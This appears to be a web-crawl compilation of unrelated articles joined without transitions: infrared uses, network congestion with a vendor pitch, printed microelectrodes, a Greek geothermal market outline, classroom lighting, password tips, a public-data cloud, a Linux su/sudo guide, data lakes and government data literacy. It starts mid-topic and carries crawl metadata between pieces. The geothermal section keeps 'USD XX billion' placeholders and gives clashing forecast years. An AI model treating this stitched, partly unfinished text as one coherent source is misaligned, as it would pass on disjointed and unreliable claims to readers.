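The "below red" naming is just the inverse relationship between wavelength and frequency (ν = c/λ). A quick check with a typical red wavelength (about 700 nm) and an illustrative near-infrared one (1,000 nm, both round example values):

```python
C = 299_792_458  # speed of light in m/s

def frequency_hz(wavelength_m):
    """Frequency of light given its wavelength: nu = c / lambda."""
    return C / wavelength_m

red = frequency_hz(700e-9)       # longest visible wavelength, ~4.3e14 Hz
near_ir = frequency_hz(1000e-9)  # longer wavelength, ~3.0e14 Hz
assert near_ir < red             # infrared: frequency below red light
```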
This is why infrared cameras are so beneficial to us as humans. Places with poor lighting attract more thieves and crooks. Cameras with lights mounted on top of them prove useless if criminals can simply find a way around the light. A light bright enough for a dark area like a basement may be expensive to maintain and will corrode with time. Therefore, the solution is to find a technology that can see in the dark. This is just one of many amazing applications infrared has to offer. Even though infrared technology has been used for several years now, more and more possibilities for it are always being discovered.
Overall, infrared technology does many things to keep us safe and protected. Advancements in the medical field make it possible to infrared to relieve us from debilitating pain and heal oral ulcers caused by chemotherapy. It can also be used to target areas on a plane's wings which are starting to freeze, preventing dangerous circumstances. It is used to see the weather via satellites which will prevent accidents in case of snow, ice, or excessive rain. It can keep us safe in the dark from potential intruders and be a second pair of eyes if anything goes wrong. Infrared is so entwined in our lives that it feels natural, and future possibilities for it are endless.
Network congestion on any IT infrastructure is a growing concern. Whether for a simple file transfer, or displaying a video conference, an organization's day-to-day IT tasks are entirely dependent on the network's health. A slight data overload in your network might cause sluggish connectivity, poor data quality, and undesirable issues. If not tended to immediately, chances are high that the organization's operations will grind to a halt. To understand the effects of network congestion better, let's dive deep into knowing what exactly it is, and where it comes from.
Network congestion occurs when the network carries or exchanges data beyond its capacity. As a result, the network might experience delays in processing information, or lose packets. Ultimately, the network won't perform to its expectations.
There are a few symptoms that indicate your infrastructure is experiencing network congestion:
High latency: Latency is a measure of the delay for the data packets to travel from its source to a destination. Usually, latency occurs because the network needs to exchange data beyond its bandwidth capacity.
The narrower the bandwidth pipeline, the more congested the data flow will be. High latency therefore reduces effective bandwidth and is a telltale sign of network congestion.
Jitter: Packets traveling the same physical distance can take a shorter or longer time to reach the destination. This variation in arrival times is what we call jitter.
Jitter and congestion go hand-in-hand when the network support device, like a router or a gateway, tries to adjust to the traffic variance. In a VoIP call, for example, jitter is indicated when a video displays choppily or the audio plays slowly, quickly, or intermittently.
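Jitter is straightforward to quantify: take the gaps between consecutive packet arrivals and average how much adjacent gaps differ. The helper below is a simplified version of that idea (real RTP statistics use a smoothed interarrival-jitter estimator, but the intuition is the same):

```python
def mean_jitter_ms(arrival_times_ms):
    """Average absolute variation between consecutive inter-arrival gaps.

    A perfectly paced stream has identical gaps and zero jitter;
    congestion makes the gaps uneven and the value grows.
    """
    gaps = [b - a for a, b in zip(arrival_times_ms, arrival_times_ms[1:])]
    if len(gaps) < 2:
        return 0.0
    deltas = [abs(b - a) for a, b in zip(gaps, gaps[1:])]
    return sum(deltas) / len(deltas)

assert mean_jitter_ms([0, 20, 40, 60]) == 0.0   # evenly paced stream
assert mean_jitter_ms([0, 20, 55, 60]) == 22.5  # congested, uneven gaps
```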
Packet Loss: This occurs when data packets are interrupted when trying to reach their destination. When your network can't receive more packets since its capacity has fallen far behind, it will ignore other incoming packets. Packet loss can produce choppy audio or video during VoIP calls, reduced throughput, and more quality degradations.
There are a myriad of aspects in your network infrastructure that can impact your network's stability. Let's look at some reasons network congestion occurs.
Bandwidth capacity: Your network doesn't meet your expectations because of the misuse of bandwidth. For instance, your business has a set of critical applications or devices that might require the most bandwidth. However, a significant amount of bandwidth might also be utilized for video streaming or gaming. Automatically, your resources might get limited for specific purposes, and this could result in performance issues.
Malicious attacks: Corporate networks often witness traffic peaks, and might mistake it to be their typical business interaction or request. In most cases, the unexpected traffic is from malicious websites that intrude into the system to accelerate network downtime. DoS and flash attacks can be disguised as requests, and this additional traffic brings all business processes to a standstill.
Network design: Network congestion doesn't result only from bandwidth limits or misconfigured traffic; it can also occur when the network infrastructure is not implemented correctly. This is especially true when the network is divided into subnets or SSIDs. A correct infrastructure is necessary for efficient data transmission. Every business has different requirements, and the network should be designed so that service monitoring and troubleshooting are easy.
Fixing network congestion is not rocket science. Once the root cause is identified, you can reduce your network's inefficiency. Here are some network congestion solutions that will keep your network optimized.
→ Monitoring your network traffic regularly can help you gain insights on how every device and interface in your network is performing. With a network congestion management tool, such as ManageEngine NetFlow Analyzer, you can monitor network congestion, drill down to application level traffic and view traffic patterns. You can see the bandwidth utilization and the underlying troubles.
→ Prioritizing network traffic significantly lowers the risk of slow internet speeds. As a network admin using a network congestion analysis tool like NetFlow Analyzer, you can see in real time which applications consume the most bandwidth relative to your prioritized application traffic.
By applying QoS policies to your network, you can classify business-critical real time applications, and make sure that those applications receive maximum bandwidth. This way, you are assured that critical apps receive enough bandwidth, and your network downtime is lowered significantly.
→ Improving bandwidth can play an important role in the way your network handles data. A wider bandwidth can help smooth the transfer of data. Additionally, increasing bandwidth might help the network handle many routers simultaneously. Ultimately, there will only be fewer interruptions, and a faster connection.
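The prioritization idea above can be illustrated with a toy strict-priority scheduler: lower-numbered classes (for example, VoIP) always drain before bulk traffic. The class names and priority numbers here are invented for the example; real QoS engines also shape and police each class:

```python
import heapq

def schedule(packets):
    """Drain (priority, name) packets, most critical (lowest number) first."""
    queue = list(packets)
    heapq.heapify(queue)
    order = []
    while queue:
        _, name = heapq.heappop(queue)  # always the highest-priority packet
        order.append(name)
    return order

# Business-critical real-time traffic leaves the queue before bulk jobs:
assert schedule([(2, "backup"), (0, "voip-1"), (1, "web"), (0, "voip-2")]) == \
    ["voip-1", "voip-2", "web", "backup"]
```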
ManageEngine's NetFlow Analyzer is a holistic network congestion monitoring tool that gives you real-time insights into your network traffic's performance. Using this network congestion test solution, you can reduce congestion in network or manage any network traffic-related challenges proactively with comprehensive monitoring of all applications and protocols of your network.
Network congestion is an occurrence when the network is overloaded with data beyond its capacity.
There are many reasons a network can become congested. Some common causes are too many devices connected to a network, outdated hardware, and faulty devices.
Since network congestion usually manifests as packet loss or delay, you can carry out a network congestion test with ping or with bandwidth monitoring. A ping test will tell you about packet loss and round-trip time (RTT). Bandwidth monitoring, on the other hand, will tell you which host or server is consuming the most bandwidth.
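If you want to act on ping results in a script, the summary lines can be parsed directly. The regexes below match the summary format printed by Linux iputils ping; other platforms word it slightly differently:

```python
import re

def parse_ping_summary(output):
    """Extract (packet loss %, average RTT ms) from ping's summary lines."""
    loss = re.search(r"([\d.]+)% packet loss", output)
    rtt = re.search(r"= [\d.]+/([\d.]+)/", output)  # min/avg/max/mdev block
    return (float(loss.group(1)) if loss else None,
            float(rtt.group(1)) if rtt else None)

sample = ("20 packets transmitted, 19 received, 5% packet loss, time 19028ms\n"
          "rtt min/avg/max/mdev = 10.312/14.801/41.209/6.220 ms\n")
assert parse_ping_summary(sample) == (5.0, 14.801)
```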
Each problem requires a different solution. Some common practices you can follow to avoid network congestion are implementing a QoS policy, replacing faulty or outdated devices, and attending to security attacks as soon as they are discovered.
Microelectrodes can be used for direct measurement of electrical signals in the brain or heart.
These applications require soft materials, however.
With existing methods, attaching electrodes to such materials poses significant challenges.
A team at the Technical University of Munich (TUM) has now succeeded in printing electrodes directly onto several soft substrates.
Researchers from TUM and Forschungszentrum Jülich have successfully teamed up to perform inkjet printing onto a gummy bear.
This might initially sound like scientists at play — but it may in fact point the way forward to major changes in medical diagnostics.
For one thing, it was not an image or logo that Prof. Bernhard Wolfrum’s team deposited on the chewy candy, but rather a microelectrode array.
These components, comprised of a large number of electrodes, can detect voltage changes resulting from activity in neurons or muscle cells, for example.
Second, gummy bears have a property that is important when using microelectrode arrays in living cells: they are soft.
Microelectrode arrays have been around for a long time.
In their original form, they consist of hard materials such as silicon.
This results in several disadvantages when they come into contact with living cells.
In the laboratory, their hardness affects the shape and organization of the cells, for example.
And inside the body, the hard materials can trigger inflammation or the loss of organ functionalities.
Rapid prototyping with inkjet printers
When electrode arrays are placed on soft materials, these problems are avoided.
This has sparked intensive research into these solutions.
Until now, most initiatives have used traditional methods, which are time-consuming and require access to expensive specialized laboratories.
“If you instead print the electrodes, you can produce a prototype relatively quickly and cheaply.
The same applies if you need to rework it,” says Bernhard Wolfrum, Professor of Neuroelectronics at TUM.
“Rapid prototyping of this kind enables us to work in entirely new ways.”
Wolfrum and his team work with a high-tech version of an inkjet printer.
The electrodes themselves are printed with carbon-based ink.
To prevent the sensors from picking up stray signals, a neutral protective layer is then added to the carbon paths.
Materials for various applications
The researchers tested the process on various substrates, including PDMS (polydimethylsiloxane) — a soft form of silicon — agarose — a substance commonly used in biology experiments — and finally various forms of gelatin, including a gummy bear that was first melted and then allowed to harden.
Each of these materials has properties suitable for certain applications.
For example, gelatin-coated implants can reduce unwanted reactions in living tissue.
Through experiments with cell cultures, the team was able to confirm that the sensors provide reliable measurements.
With an average width of 30 micrometers, they also permit measurements on a single cell or just a few cells.
This is difficult to achieve with established printing methods.
“The difficulty is in fine-tuning all of the components — both the technical set-up of the printer and the composition of the ink,” says Nouran Adly, the first author of the study.
“In the case of PDMS, for example, we had to use a pre-treatment we developed just to get the ink to adhere to the surface.”
Wide range of potential applications
Printed microelectrode arrays on soft materials could be used in many different areas.
They are suitable not only for rapid prototyping in research, but could also change the way patients are treated.
“In the future, similar soft structures could be used to monitor nerve or heart functions in the body, for example, or even serve as a pacemaker,” says Prof. Wolfrum.
At present he is working with his team to print more complex three-dimensional microelectrode arrays.
They are also studying printable sensors that react selectively to chemical substances, and not only to voltage fluctuations.
- Nouran Adly, Sabrina Weidlich, Silke Seyock, Fabian Brings, Alexey Yakushenko, Andreas Offenhäusser, Bernhard Wolfrum. Printed microelectrode arrays on soft materials: from PDMS to hydrogels. npj Flexible Electronics, 2018; 2 (1) DOI: 10.1038/s41528-018-0027-z
The market, which is estimated to be USD XX billion in 2016, is expected to grow to USD XX billion by 2021, at a CAGR of XX percent.
Geothermal energy is considered one of the cleanest energies in the world. The Greek government has shifted its focus toward diversifying its mix of power generation sources, looking at renewable resources such as solar energy and geothermal energy.
Energy production from this technology depends on the availability of geothermal energy sources. Depending on the amount of heat generated, geothermal energy can be used for power generation, thermal springs, or other purposes. Various places have been identified as potential geothermal energy resources, but only a small fraction of them are currently being exploited. The Greek government has identified the potential of this low-temperature geothermal energy and has classified it according to usage, such as bathing, recreation and tourism, industrial use, space heating, therapeutic use, and drinking. The localities with these thermal springs have become new tourist attractions and have given a boost to the local economy by emphasizing thermal spas and centers for entertainment and physical conditioning that revitalize the body.
With the increase in energy demand, extra efforts are required for new developments in Greece, as the current energy supply is not keeping up with the growth in power demand. This increase in demand, combined with government regulations, has created favorable conditions for public-private partnerships. At the moment, the geothermal resources at these sites are used for BRT (bathing, recreation and tourism) and TDB (therapeutic, drinking and bathing), in spite of their potential for industrial use and space heating (PIS). The Greek government is planning to utilize geothermal energy resources for industrial use, which will indirectly help in reaching the country's energy goals.
1. Executive Summary
2. Research Methodology
3. Market Overview
3.2 Installed Capacity and Forecast, until 2023 (in MW)
3.3 Market Size and Demand Forecast, until 2023 (in USD billion)
3.4 Recent Trends and Developments
3.5 Government Policies and Regulations
4. Markets Dynamics
5. PESTLE Analysis
6. Industry Attractiveness - Porter’s Five Force Analysis
6.1 Bargaining Power of Suppliers
6.2 Bargaining Power of Consumers
6.3 Threat of New Entrants
6.4 Threat of Substitutes
6.5 Intensity of Competitive Rivalry
7. Greece Geothermal Power Market Analysis, by Technology
7.1 Direct Dry Steam Plants
7.2 Flash Steam Plants
7.3 Binary Power Plants
8. Key Company Analysis (Overview, Business Segmentation, Financial Analysis**, Recent Development and Analyst View)
8.1 EPC Contractors & Equipment Suppliers
8.2 Project Operators & Developers
9. Competitive Landscape
9.1 Mergers & Acquisitions
9.2 Joint Ventures, Collaborations and Agreements
9.3 Strategies Adopted by Leading Players
10.1 Contact Us
(**Subject to availability on public domain)
Classroom lighting can be an overlooked factor for children’s success in school. However, studies have shown that lighting quality affects students’ abilities to see clearly, concentrate and perform well in the classroom. Since lighting plays a critical role in our everyday lives, it’s worth our while to understand the quality of light that’s shining down on our children.
In the first part of our series we’ll explain how replacing traditional classroom lighting with full-spectrum lighting helps students’ performance in the classroom.
Classroom Lighting and Visual Acuity
Could it be possible that different classroom lighting, or the use of fluorescent classroom light filters, could improve children’s abilities to see clearly?
Visual acuity (VA) commonly refers to the clarity of vision. It depends on optical and neural factors: (i) the sharpness of the retinal focus within the eye, (ii) the health and functioning of the retina, and (iii) the sensitivity of the interpretative faculty of the brain.
A 2006 study by Berman et al. on lighting and visual acuity suggests this is exactly the case. The study compared the use of standard color temperature fluorescent lighting with the use of high color temperature fluorescent lighting on children’s visual acuity in the classroom.
Let’s quickly define visual acuity: Visual acuity is the clarity or sharpness of vision. The graphic below shows the Snellen chart, a common method for measuring a person’s visual acuity.
Classroom Lighting Study Results
The results from the study were quite enlightening, if you’ll pardon the pun.
The study showed that high color temperature fluorescent lighting helps students see clearer and allows them to read faster. It also reduces the visual fatigue and glare that are typically experienced with standard color temperature fluorescent lighting.
Classroom lighting used in the study included standard 3600K correlated color temperature (CCT) lights and 5500K CCT fluorescent fixtures.
To better explain what this means, we’ve provided a breakdown of correlated color temperatures:
- 2000K CCT is equal to sunlight at sunrise or sunset under clear skies
- 3500K CCT is the equivalent to direct sunlight an hour after sunrise
- 4300K CCT is like morning or afternoon direct sunlight
- 5400K CCT is akin to noon summer sunlight
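Those reference points can be folded into a small lookup helper (the bands are the article's own; matching by nearest reference value is my simplification):

```python
def daylight_equivalent(cct_kelvin):
    """Rough daylight analogue for a correlated color temperature (CCT)."""
    bands = [
        (2000, "sunlight at sunrise or sunset under clear skies"),
        (3500, "direct sunlight an hour after sunrise"),
        (4300, "morning or afternoon direct sunlight"),
        (5400, "noon summer sunlight"),
    ]
    # Pick the band whose reference CCT is closest to the requested value.
    return min(bands, key=lambda band: abs(band[0] - cct_kelvin))[1]

# The study's 5500K lamps sit closest to noon summer sunlight:
assert daylight_equivalent(5500) == "noon summer sunlight"
```

By this mapping, the study's standard 3600K fixtures approximate early-morning sun, while its 5500K fixtures approximate midday light.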
In short, high-quality classroom lighting improves students’ visual acuity, giving them the sight they need to perform well in school.
Pupil Size Matters
What does a smaller pupil diameter mean? When the pupil is smaller, the depth of the vision field increases and visual acuity improves. This, in turn, results in a reduction in visual fatigue, faster reading times and less visual glare. Essentially, the eye is seeing at its most optimal level.
Whether you are using high color temperature classroom lighting bulbs or classroom light filters to increase the color temperature, you will find your students benefit from improved visual acuity and often perform better in the classroom. By adding more blue/green into the color spectrum, you are essentially creating full spectrum light.
The study also notes a strong correlation between pupil size and reading performance, where light spectrum, not brightness is the driving factor. In a follow-up blog, we will examine exactly how replacing lighting in classrooms with full spectrum lighting has proven to increase reading and math test scores.
Erik Hinds is Vice President of Helping People at Make Great Light. For more information on how fluorescent light filters for classrooms can improve the learning environment, please visit the resource center.
Passwords today are a real threat to security. A recent report shows that over 80% of hacking-related breaches are due to weak or stolen passwords. If you want to safeguard your personal info and assets, creating secure passwords is a big first step. Impossible-to-crack passwords are complex, with multiple types of characters (numbers, letters, and symbols). Making your passwords different for each website or application also helps defend against hacking.
That’s why we recommend LastPass Password Generator. LastPass runs locally on your Windows, Mac or Linux computer, as well as your iOS or Android device. The passwords you generate are never sent across the web.
Here are some common sense Password Tips
- Always use a unique password for each account you create. The danger with reusing passwords is that as soon as one site has a security issue, it‘s very easy for hackers to try the same username and password combination on other websites.
- Don’t use personally identifiable information in your passwords. Names, birthdays, and street addresses may be easy to remember but they’re also easily found online and should always be avoided when creating new passwords to ensure the greatest strength.
- Create passwords with a minimum of 12 characters, containing letters, numbers, and special characters. Some users prefer passwords that are 14 or more characters in length.
- If you’re creating a master password that you’ll need to remember, try using phrases or lyrics from your favorite movie or song. Just add random characters, but don't replace them in easy to guess patterns.
- Use a password manager like LastPass to create and manage your passwords. It'll keep your information protected from attacks or snooping.
- Avoid weak, commonly used passwords like asd123, password1, or Temp!. Some examples of a strong password include: G&294E3w(LN1*, KIYs^r@az)97$x, 9iw%v33gTwo)9k*g.
- Avoid using personal information for your security questions. Use LastPass to generate another password and store it as the answer to these questions. The reason? Some information, like the name of the street you grew up on or your mother’s maiden name, is easily found by hackers and can be used in a brute-force attack to gain access to your accounts.
- Avoid using similar passwords that change only a single word or character. This practice weakens your account security across multiple sites.
- Change your passwords when you have reason to, after you've shared them with someone, after a website has had a breach, or when it's been over a year since you last rotated it.
- Never share your passwords via email or text message. The secure way to share is with a tool like LastPass that gives you the ability to share a hidden password and even revoke access when necessary.
|
<urn:uuid:f4517a32-bb4e-4a75-a370-8b094687f7bc>
|
CC-MAIN-2022-40
|
https://www.alpineweb.com/backroom/knowledgebase/20/Creating-a-Secure-Password.html
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00058.warc.gz
|
en
| 0.919835 | 601 | 2.84375 | 3 |
Public cloud provider CloudSigma has a vision for a cloud-based “data discovery” model that will take Big Data generated around the world and beyond (yes, in space) and put it in the hands of users. The company is building ecosystems out of publicly available data, storing it and making it accessible for users to build services around. “Data has gravity, and that naturally draws computing into the cloud,” said Robert Jenkins, CEO, CloudSigma.
There are lots of data in the public domain, but the barriers to access and leverage it is high. The Zurich-based company is trying to address this problem of “elitism,” making the data available on-demand in its Big Data cloud so users can easily access and temporarily mount it on virtual machines to build services. There is a wealth of possibilities across industries and across disciplines.
“Even though it’s accessible, most people can’t use it,” Jenkins said. “What we're doing is storing this data for free and making money on the compute end of things, as users access it on an as-needed basis to build better systems and offerings.”
Inspired by European science cloud
The work was born out of the Helix Nebula Marketplace, launched to provide European scientists easy access to commercial cloud services. CloudSigma is one of the companies represented on the marketplace. Helix Nebula is a public-private collaboration launched to support massive IT and data requirements of European research organizations, including European Molecular Biology Laboratory, European Space Agency and European Organization for Nuclear Research (CERN), best known for its Large Hadron Collider.
The vision is a cloud-based discovery model. “Making public data extensible is a big movement, and there’s been huge progress,” said Jenkins. “It’s becoming yesterday’s problem. The problem now is the coordination problem. The challenge with Big Data is you can’t move it around. Cloud is in a unique position to solve this problem.”
“Say I’m a user that has an idea for a better climate model or trading algorithm, but the bar is too high to set up the proper resources,” he said. “We’ve been working on putting the data in public cloud so it’s much more useful. We dedupe the data, replace ownership with access. All you need is short access, next to on-demand, ad-hoc computing. We’re happy because you’re doing the computing, and we can give public institutions the free storage.”
From ash-cloud data to MRI scans
CloudSigma is already working with a number of institutions and has several agreements in place with organizations like the European Space Institute and an Iceland organization that maps ash cloud and volcanic activity.
It’s working with institutions that do neurological research as well. “We’re building a cloud backend for MRI scanners that sends it up to the cloud, renders and creates a much higher quality image,” said Jenkins. “They get a better quality service and it takes the computing out of the operating room.” Most general MRIs aren’t done in the highest resolution because of cost, but with cloud it has the processing power on-demand to produce better images, which helps with Alzheimer's research, as an example.
Many choose to donate their scans to science, and the company is aggregating publicly available scans from hundreds of hospitals in Europe and all over the world. It will allow neurological research to see time series of brain scans for research.
Jenkins also spoke of a satellite launched in Europe for world observation. It has magnetic field sensors, can track ground water movement and the movement of the Earth with down-penetrating radar. The satellite generates a terabyte of data a day, and Jenkins wants to put this data in people's hands as well.
More closed financial data product in the making
The possibilities are endless as there’s an increasing movement to make more publicly available data useful for the public.
CloudSigma’s data ecosystems also go beyond public data. Going forward, the company is also looking to provide a similar ecosystem for financial data. “We’re looking into the financial services industry and seeing how we can expose it securely to service providers,” said Jenkins. This kind of data is of course more proprietary and sensitive, so the company is building a secure service for it.
How to Escalate Permissions on Linux with Sudo and Su
There comes a time in every administrator's life when you need to escalate privileges in Linux. Windows can be a lot more forgiving when you need to perform an administrative task. The Windows UAC prompt makes escalating privileges easy.
So much so that a lot of entry-level IT professionals don't even realize that just because they have an admin account doesn't mean that they still don't need to escalate user permissions to perform administrative tasks in Windows.
Linux isn't that nice, though. In Linux, escalating privileges is a very deliberate act. Let's discuss how you escalate privileges in Linux and why you would want to.
Why Escalate Privileges in Linux?
There are a lot of parts to a computer system that can be dangerous to work with. Editing those components can cause issues like preventing a computer from starting properly, disabling services, damaging hardware, or causing security issues. So, OSes like Linux and Windows require escalated privileges before those components can be changed.
Modern operating systems give systems administrators a way to secure the OS through a means of user accounts and privilege levels. This lets normal users access and use a computer to get a job done without being able to break that computer. Meanwhile, system administrators are still capable of performing the complex system administration tasks required to keep computer systems up and running.
It is assumed by these OSes that if a person can escalate privileges in an OS then they must be an administrator and they know what they are doing. The responsibility of security and maintenance is then passed from the OS itself to the system administrator.
Locking certain tasks behind user privileges is also a security measure, too. By requiring input from a user to escalate privileges, the OS can prevent malware from making changes on that system. This can prevent malware from doing things like automatically installing software on a computer.
How to Escalate Privileges in Linux
Standard user accounts in Linux cannot perform administrative tasks, at least not by default. Linux doesn't have the concept of an administrative account like Windows. Let's rewind there for a moment. All operating systems have admin profiles. Sort of.
Operating systems have user profile permissions or capabilities. These profiles and permissions designate what kinds of tasks can be performed in an operating system. Windows, by default, has three user account profile types:

- Administrator
- Standard user
- Guest
Those three types of account profiles are nothing more than profiles with common permissions pre-configured for them. Those permission levels can be changed per profile or account.
This concept confuses a lot of newer IT administrators and help desk techs. It's common for someone to think that just because they have admin access in Windows that they can do everything on a computer. This couldn't be further from the truth, though.
In an enterprise environment, it's common for there to be admin profiles and super-admin profiles. Very few administrators in an organization will have super-admin privileges with permissions to adjust everything on a computer while techs will have a normal admin profile.
Linux does have a concept of user groups, but these perform slightly different functions in Linux. A default Linux install will have standard user profiles, a root profile (the system administrator), and various system users and groups depending on what applications are installed.
Though a standard user profile in Linux can be adjusted to have various permission levels, it's common practice to escalate privileges into the root profile to perform administrative tasks. Users would either use the SU command, the SUDO command or log into the Linux OS with the root account itself depending on which version of Linux is being used.
For example, Red Hat Linux will use the SU command. Debian or Ubuntu OSes will use the SUDO command.
Pro Tip: Though Ubuntu and Debian don't use the SU command because the root account's password is locked by default for security reasons, you can set a password for the root profile to enable the SU command in these versions of Linux. Simply use the 'sudo passwd root' command in the Linux terminal to set a new password for the root profile. This will also enable the ability to log in with the root profile directly. Proceed with caution, though. This can be a security risk.
An Overview of How to Escalate Permissions on Linux with Sudo, Su [VIDEO]
In this video, Shawn Powers covers how to effectively manage privileges. Specifically, you'll learn about three different Linux commands that allow you to escalate your privileges from a lower-level account to one with more permissions, up to (and including) super user rights. He'll show you which to use, how, and when to do so.
What is the SU Command in Linux?
SU stands for 'substitute user'. It's a way of escalating privileges in Linux. The SU command changes the input from your Linux profile to the root profile within the Linux terminal. This allows you to perform tasks in Linux typically limited to the root account.
Escalating privileges to the root account is easy. In the Terminal, enter the command 'su'. You will be prompted for the Root account's password. Keep in mind the password you need to enter is for the root account and not your account.
After escalating to the Root account, notice that the terminal prompt changed from your username to the Root account's name. If you are using this Linux computer locally (as opposed to connecting to it remotely), you should see something like 'root@localhost' instead of 'yourName@localhost'.
Once you use the SU command and switch to the Root account, you do not need to keep using the SU command. Every command you enter in the terminal at this point will be entered as the Root profile. Be wary of this. For example, if you enter the command to store Git credentials globally while impersonating the Root profile, those Git credentials will only work while using that Root account. Those credentials will not be accessible while using your normal Linux profile.
To stop using the Root profile, type 'exit' in the terminal.
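Put together, a typical SU session looks something like this (the username and hostname below are placeholders):

```shell
alice@localhost:~$ su
Password:                   # enter the *root* password, not alice's
root@localhost:/home/alice# whoami
root
root@localhost:/home/alice# exit
alice@localhost:~$
```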
What is the SUDO Command in Linux?
The SUDO command stands for 'substitute user do' as in 'do something as another user'. The SUDO command works similarly to the SU command in Linux but with a couple of exceptions. For instance, when you use the SUDO command, you will use the password for your Linux profile instead of the password for the Root account.
Likewise, you must use the SUDO command to escalate privileges for each command individually. Using the SUDO command does not cause you to impersonate the Root account in Linux permanently as the SU command does.
Pro Tip: You can use the SUDO command to fully impersonate the Root account by using 'sudo su' in the terminal. This would be like using the SU command by itself.
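As an illustration, the same idea with SUDO might look like the session below. The package command assumes a Debian-based system, and the username is a placeholder:

```shell
alice@localhost:~$ sudo apt update
[sudo] password for alice:      # alice's own password this time
...
alice@localhost:~$ sudo su      # fully impersonate root, per the Pro Tip
root@localhost:/home/alice#
```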
Only certain accounts in Linux can use the SUDO command. By default, the account created when Linux is installed is always configured to use the SUDO command. That is because user accounts are typically part of the Wheel user group in Linux, and the Wheel user group has permission to use the SUDO command.
The configuration file controlling the SUDO command is typically stored in /etc/sudoers. This could change depending on the version of Linux you are using, so if you cannot find the 'sudoers' file, consult the documentation for the distribution of Linux you are using for that file's location.
To edit the 'sudoers' file, you wouldn't make any changes to it directly, though. You should use an application called VISUDO for that.
What is the VISUDO Command in Linux?
VISUDO is a command to edit the configuration file for the SUDO command. Using this command will edit the 'sudoers' configuration file in the '/etc' folder in Linux. Using the VISUDO command will also open the 'sudoers' file within a wrapper that checks the syntax before saving. This will help prevent any mistakes from being saved to that file by accident.
The 'sudoers' file has a lot of great examples inside of it for each configuration option.
Typically, when you change who can use the SUDO command, you would update the user group that can use that command and not individual users themselves. In the configuration file, there is an option that starts with '%wheel'. This is the 'wheel' group. User accounts are part of this group by default.
The percentage sign tells the configuration file that 'wheel' is a user group. You can add, modify, or change user groups by replicating the configuration option below replacing 'wheel' with the name of the user group you would prefer to use:
%wheel ALL=(ALL) ALL
Below that option is an option to allow user groups to use the SUDO command without entering a password. That entry looks like this:
## Same thing without a password
# %wheel ALL=(ALL) NOPASSWD: ALL
To enable the ability to use the SUDO command without a password, uncomment that line above (remove the # from the beginning of it) and save the 'sudoers' file. Enabling that configuration will let you run scripts without being required to enter a password. That means scripts can run unattended.
Pro Tip: Instead of making all commands accessible with the SUDO command without a password by uncommenting the line above, you can allow only specific commands by replacing 'NOPASSWD: ALL' with 'NOPASSWD: /full/path/to/command' instead (e.g., NOPASSWD: /usr/bin/ls); sudoers expects commands to be listed by their full paths.
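For example, a hypothetical entry added through VISUDO might let one group restart a single service, and only that, without a password. The group name, command path, and service name here are assumptions for illustration:

```
# Members of the "deploy" group may run exactly this one command, passwordless.
%deploy ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart myapp.service
```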
We covered a lot of information in this article for something as simple as escalating user privileges in Linux. Just in case you need a recap, here you go.
You need to escalate privileges in Linux before executing any restricted commands. Depending on the version of Linux you are using, you will either use the SU or SUDO commands. Red Hat and Fedora use SU while Debian-based versions of Linux use SUDO.
The SU command lets you impersonate the Root profile in the Linux terminal until you exit out of that profile. The SUDO command lets you impersonate the Root profile but only for a single command. You need to keep using SUDO for each subsequent command. Use the VISUDO tool to edit the 'sudoers' configuration file for the SUDO command.
A central location for storing various types of data a business needs. A data lake is different from a data warehouse in the sense that data can remain in its raw form, without being transformed. This allows developers to essentially build a “schema on read” which basically means as data gets processed, the application can determine how to use and store that data. This makes big data analysis easier because less work is required to cleanse and organize the data in the data lake. AWS, Azure and Google Cloud offer data lake solutions in the form of their blob storage, like S3 in the case of AWS. All data in a data lake can be stored in an S3 bucket and then applications can read from that bucket and determine how to process it. Data Lake technologies like Glue can crawl buckets and determine what type of data is in them, making querying for that data much simpler.
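The "schema on read" idea can be sketched in a few lines. Raw records are kept exactly as they arrived, and the field set is derived only when the data is read. The records and field names below are invented for illustration, and nothing here touches S3 or Glue themselves:

```python
import json

# Raw, heterogeneous records as they might land in a data lake bucket.
# Nothing was cleaned or normalized on write.
raw_records = [
    '{"user": "ana", "clicks": 3}',
    '{"user": "bo", "clicks": 5, "country": "DE"}',
]

def infer_schema(records):
    """Derive the set of fields at read time, a minimal 'schema on read'."""
    fields = set()
    for line in records:
        fields.update(json.loads(line).keys())
    return sorted(fields)

print(infer_schema(raw_records))  # ['clicks', 'country', 'user']
```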
in other words
The Library Archives - All your data in its oldest, purest form waiting for you to find it.
The world of data analytics is changing faster than ever. And government employees have to keep up or get left in the dust. By 2024, 60% of government data analytics and artificial intelligence (AI) projects are predicted to directly impact real-time operational decisions and outcomes. As public servants, you need to increase your literacy of the larger data ecosystem to do your jobs efficiently and effectively. This guide will help you learn four key competencies inspired by that lifecycle so you can enhance everyday collaboration and bring continuous improvement to your team and agency. The four key competencies are data visualization, data storytelling, automation and innovation. With the help of experts who do this work every day, here are best practices to help you better use and share data at work. According to the Federal Data Strategy 2021 Action Plan, “By the end of 2022, agencies should have a solid foundation throughout their workforce, including a minimum level of data literacy among all staff and a sufficient accumulation of data skills to allow for effective performance of all aspects of the data lifecycle.” Download the guide to learn how to reach these goals with the four key competencies.
Data Literacy for Government Transparency
“Technology has changed so much, but our skill sets haven’t kept pace. People and organizations that previously didn’t use data all that much suddenly have to start using it at a more advanced level. That’s why it’s imperative to establish a data literacy program at your agency. First, it needs to be agile. Data training cannot be a one-and-done deal. Second, have accessible assessments. Are you developing sustainable programs that meet people at the skill levels they’re at? And are you assessing the actual skills of your target audience, or the employees who are impacted by data? Third, co-design, or design solutions with users and stakeholders from the start. People can resist change especially when they are not involved in it. When you build data solutions or programs, you need the perspectives of users to inform the journey, particularly when they’re non-data experts.”
Read more insights from Tableau’s Senior Manager of Customer Success, State and Local Government, Nongovernmental Organizations (NGOs) and Higher Ed, Sarah Nell-Rodriquez.
What Story Is Your Data Telling?
“Let’s say defense analysts are trying to connect the dots around terrorist activity. Using various data points such as bank account numbers, location coordinates, equipment types and names, analysts can derive a cohesive “story” from the data that aids the mission. To do this, traditionally, analysts combed through data from various sources — spreadsheets, databases, cloud storage, etc. — to manually input into an Excel file and then make connections between the fields. ‘To get to a story or result on one particular mission-critical use case, it was taking six to nine months of two full-time employees just combing through this data,’ said MarkLogic’s Eric Putnam, who has worked in the U.S. defense community. In other words, this manual integration was taking too much time and too much effort.”
Read more insights from MarkLogic’s Senior Account Executive for National Security Programs, Eric Putnam.
How AI Opens Up Other Types of Data
